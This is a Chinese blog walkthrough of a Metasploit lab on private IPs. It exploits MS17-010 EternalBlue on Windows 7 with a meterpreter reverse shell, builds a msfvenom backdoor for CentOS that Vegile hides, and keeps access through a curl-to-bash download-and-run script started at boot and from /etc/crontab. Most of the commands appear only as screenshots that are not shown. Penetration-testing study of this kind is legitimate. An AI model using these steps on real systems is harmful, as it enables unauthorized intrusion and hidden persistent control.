利用metasploit渗透测试制作隐藏后门

利用metasploit渗透测试制作隐藏后门

@目录

1. 使用ms17-010永恒之蓝漏洞对win7进行渗透

2. 制作linux无文件木马程序

3. 使用脚本来进行自动创建后门

  1. 使用ms17-010永恒之蓝漏洞对win7进行渗透

    已知win7ip:192.168.47.129
    使用nmap对其进行开放端口探测

在这里插入图片描述

在kali端使用msf加载辅助模块探测目标机是否存在ms17-010漏洞

在这里插入图片描述

[+] 192.168.47.129:445    - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)

存在ms17-010漏洞,加载攻击模块进行漏洞利用

msf5 auxiliary(scanner/smb/smb_ms17_010)> use exploit/windows/smb/ms17_010_eternalblue

加载payload模块反弹连接

msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp

进行设置配置

show options

在这里插入图片描述
执行成功
在这里插入图片描述
2. 制作linux无文件木马程序
这里的目标机时centos7系统,ip=192.168.47.130使用msfvenom生成恶意文件保存在/var/www/html/
在这里插入图片描述
另外在生成一个当作隐藏后门
在这里插入图片描述
开启apache2服务让用户下载后门

systemctl start apache2

将vegile上传到/var/www/html目录下
在这里插入图片描述
开启msfconsole加载模块启动监听
在这里插入图片描述
在centos7端下载backdoor文件,使用chmod命令赋予操作权限,执行
在这里插入图片描述
在kali端已建立连接
在这里插入图片描述
在kali端新建窗口在使用msfconsole加载模块开始监听隐藏后门程序
在这里插入图片描述
在原先建立的连接执行wget命令下载Vegile后门隐藏文件,并在该目录下下载原先制作好的后门程序
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
给Vegile添加执行权限,并隐藏后门程序

在这里插入图片描述
在这步给后门程序加了执行权限,忘了给Vegil加执行权限,导致了这个错误,后面在centos7上给Vegil加了执行权限(在centos7上给Vegil加了执行权限后颜色会变成绿色,所以在centos上操作了。。。。)
在这里插入图片描述
在这里插入图片描述
这里在另一个控制台已经成功连接了

在这里插入图片描述
Vegil –i表示隐藏后门

3. 使用脚本自动创建后门
在/var/www/html目录内创建脚本
在这里插入图片描述
在msf加载模块开启监听
在这里插入图片描述
用户下载脚本自动执行
在这里插入图片描述
bash <()表示将括号内的内容通过bash来执行
curl是利用url语法在命令行下进行文件传输工具
-s表示不输出任何内容
-L表示后面接http连接

如果不使用-s,结果如下图
在这里插入图片描述
此时msf已经建立连接
在这里插入图片描述
使用脚本的话可以在自己侵入主机后自己下载下来,然后设置开机自启,这样就可以方便下次建立连接,也不用自己重复操作

将脚本放到开启自启
在这里插入图片描述
断开连接,重新启动监听并在centos7端重启系统
在这里插入图片描述
在这里插入图片描述
重启centos7后,登录之后,kali的msf端已经建立连接

在/etc/crontab/目录配置计划任务
在这里插入图片描述
完成了

  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值